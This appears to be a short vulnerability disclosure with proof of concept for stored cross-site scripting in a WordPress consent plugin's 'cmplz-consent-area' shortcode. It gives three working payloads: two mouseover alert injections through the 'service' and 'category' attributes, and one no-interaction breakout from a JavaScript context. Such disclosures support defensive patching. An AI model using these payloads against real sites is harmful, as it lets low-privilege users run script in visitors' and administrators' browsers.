The plugins do not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[cmplz-consent-area service='"onmouseover=alert(/XSS-service/)//']a[/cmplz-consent-area]
[cmplz-consent-area category='"onmouseover=alert(/XSS-category/)//']a[/cmplz-consent-area]
And move the mouse over the generated link to trigger the XSS
Payload to trigger the XSS w/o interaction (the category attribute is also affected, with another payload):
[cmplz-consent-area service="')){}};alert(/XSS-service-js/); function b(){ if (cmplz_has_service_consent('a"]a[/cmplz-consent-area]